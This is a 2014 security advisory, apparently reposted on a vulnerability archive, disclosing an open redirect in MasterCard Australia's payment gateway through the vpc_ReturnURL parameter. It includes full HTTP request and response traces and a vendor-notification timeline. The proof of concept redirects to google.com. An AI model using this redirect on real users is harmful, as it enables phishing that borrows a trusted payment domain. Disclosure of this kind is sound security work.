MasterCard Open Redirect

2014.07.29
Credit: Anastasios
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-601

======================================================================= MasterCard - Open Redirect ======================================================================= Affected Domain : mastercard.com.au Local/Remote : Remote Severity : Very Low Vulnerable URL : https://migs.mastercard.com.au/vpcpay?vpc_ReturnURL=http://<any_domain> Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com] [Summary] Certain unspecified input is not properly verified before being used. This can be exploited to redirect a user to an arbitrary website e.g. when a user clicks a specially crafted link to the affected script hosted on a trusted domain. [Vulnerability Details] GET Request: ------------ GET https://migs.mastercard.com.au/vpcpay?vpc_ReturnURL=http://www.google.com HTTP/1.1 Host: migs.mastercard.com.au User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive GET Response: ------------- HTTP/1.1 302 Found Date: Mon, 23 May 2014 12:26:51 GMT Server: Apache P3P: CP="NOI DSP COR CURa ADMa TA1a OUR BUS IND UNI COM NAV INT" Set-Cookie: PAY4939831625825013779=PAY8CA6985107791A1B572838CBB73CF5D3; Path=/; Secure Expires: Sun, 15 Jun 1990 00:00:00 GMT Cache-Control: no-cache Set-Cookie: PS_ENCODING_COOKIE=iso-8859-1; Expires=Mon, 23-Jun-2014 12:56:51 GMT; Secure Accept-Charset: iso-8859-1, unicode-1-1;q=0.8 Pragma: no-cache Location: https://migs.mastercard.com.au/vpcpay?o=pt&DOID=AA93D612C3210464C0F03BF66D5DCDCE&paymentId=4999831621825113478 Content-Language: en Content-Length: 0 Keep-Alive: timeout=15, max=79 Connection: Keep-Alive Content-Type: text/html;charset=iso-8859-1 Follow up GET Request I: ------------------------ GET https://migs.mastercard.com.au/vpcpay?o=pt&DOID=AA93D612C3210464C0F03BF66D5DCDCE&paymentId=4999831621825113478 HTTP/1.1 Host: migs.mastercard.com.au User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive GET follow up Response I: ------------------------- HTTP/1.1 302 Found Date: Mon, 23 May 2014 12:27:10 GMT Server: Apache P3P: CP="NOI DSP COR CURa ADMa TA1a OUR BUS IND UNI COM NAV INT" Expires: Sun, 15 Jun 1990 00:00:00 GMT Cache-Control: no-cache Set-Cookie: PS_ENCODING_COOKIE=iso-8859-1; Expires=Mon, 23-Jun-2014 12:57:10 GMT; Secure Accept-Charset: iso-8859-1, unicode-1-1;q=0.8 Pragma: no-cache Location: http://www.google.com?vpc_Amount=0&vpc_BatchNo=0&vpc_Locale=en&vpc_Message=Required+field+vpc_Merchant+was+not+present+in+the+request&vpc_TransactionNo=0&vpc_TxnResponseCode=7 Content-Language: en Content-Length: 0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html;charset=iso-8859-1 GET follow up Request II: ------------------------- GET http://www.google.com/?vpc_Amount=0&vpc_BatchNo=0&vpc_Locale=en&vpc_Message=Required+field+vpc_Merchant+was+not+present+in+the+request&vpc_TransactionNo=0&vpc_TxnResponseCode=7 HTTP/1.1 Host: www.google.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive GET follow up Response II: -------------------------- HTTP/1.1 302 Found Location: http://www.google.com/?gws_rd=cr&ei=QR2oU9PfGYf-ygO6yIC4Dg Cache-Control: private Content-Type: text/html; charset=UTF-8 Date: Mon, 23 May 2014 12:27:41 GMT Server: gws Content-Length: 258 X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Alternate-Protocol: 80:quic <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"> <TITLE>302 Moved</TITLE></HEAD><BODY> <H1>302 Moved</H1> The document has moved <A HREF="http://www.google.com/?gws_rd=cr&amp;ei=QR2oU9PfGYf-ygO6yIC4Dg">here</A>. </BODY></HTML> [Time-line] 23/06/2014 - Advisory created 23/06/2014 - Mastercard notified: no response 25/06/2014 - Vendor contacted again - different department: no response 08/07/2014 - Re-contacted both departments: no response 27/07/2014 - Advisory published


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top